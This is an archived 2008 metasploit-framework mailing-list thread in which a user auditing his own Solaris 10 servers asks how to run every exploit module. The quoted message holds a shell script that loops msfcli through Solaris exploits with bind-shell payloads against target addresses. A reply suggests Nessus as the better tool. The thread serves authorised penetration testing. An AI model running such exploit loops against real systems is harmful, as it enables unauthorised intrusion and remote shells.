[prev in list] [next in list] [prev in thread] [next in thread] 

List:       metasploit-framework
Subject:    Re: [framework] try to exploit everything
From:       "arthur" <mail2arthur () gmail ! com>
Date:       2008-07-25 18:15:38
Message-ID: 000f01c8ee82$74bd6eb0$9b080f0a () usr ! ingenico ! loc
[Download RAW message or body]

Thanks. Actually MSF is the 3rd section in my report. The first section is
using nmap to discover the ips/ports, the 2nd section is Nessus blind scan
with all plugin enabled (also unchecked the safeCheck and turn on the
throughTests), but the auditor still likes to see more with MSF :(

Just try to find a easy way to make the guy happy instead of talking too
much.

You know what, even our server is not running web app, he still ask a test
of XSS...

Arthur

> Arthur,
>
> For this kind of testing, Metasploit is the wrong tool for the job.
> If you just want to huck a bunch of exploits at the target without
> regard for whether they might actually work, try something like Nessus
> instead.
>
> Hope this helped,
> egypt
>
> 2008/7/25 arthur <mail2arthur@gmail.com>:
> > Hi All,
> >
> > We are pentesting our Solaris 10 servers and so far I built a script to
call
> > msfcli to try all the Solaris modules (even Solaris 8/9, partial script
> > below). However the auditor likes to see we try ALL to make sure the
> > server/app won't down after a silly hacker try a wrong attack.
> >
> > With RHOST set globally, is there any easy way to run all.
> >
> > Thanks,
> >
> > Arthur
> >
> > ...
> > APP=./msfcli
> > ADD="..."
> > PL1=cmd/unix/bind_perl
> > PL2=generic/shell_bind_tcp
> >
> > test_run()
> > {
> >   cmd=$@
> >   echo $cmd
> >   echo $cmd>>$FN
> >   sudo $cmd>>$FN 2>&1
> > }
> >
> > for addr in $ADD ; do
> >   test_run $APP solaris/dtspcd/heap_noir RHOST=$addr C
> >   test_run $APP solaris/lpd/sendmail_exec RHOST=$addr PAYLOAD=$PL1 E
> >   test_run $APP solaris/samba/lsa_transnames_heap RHOST=$addr
PAYLOAD=$PL2 E
> >   test_run $APP solaris/samba/trans2open RHOST=$addr PAYLOAD=$PL2
TARGET=0 E
> >   test_run $APP solaris/sunrpc/sadmind_exec RHOST=$addr PAYLOAD=$PL1 E
> >   test_run $APP solaris/sunrpc/ypupdated_exec RHOST=$addr PAYLOAD=$PL1 E
> >   test_run $APP solaris/telnet/fuser RHOST=$addr PAYLOAD=$PL1 E
> >   test_run $APP solaris/telnet/ttyprompt RHOST=$addr PAYLOAD=$PL1 E
> > done
> > ...
> > _______________________________________________
> > http://spool.metasploit.com/mailman/listinfo/framework
> >
> >

_______________________________________________
http://spool.metasploit.com/mailman/listinfo/framework
[prev in list] [next in list] [prev in thread] [next in thread]

Configure | About | News | Add a list | Sponsored by KoreLogic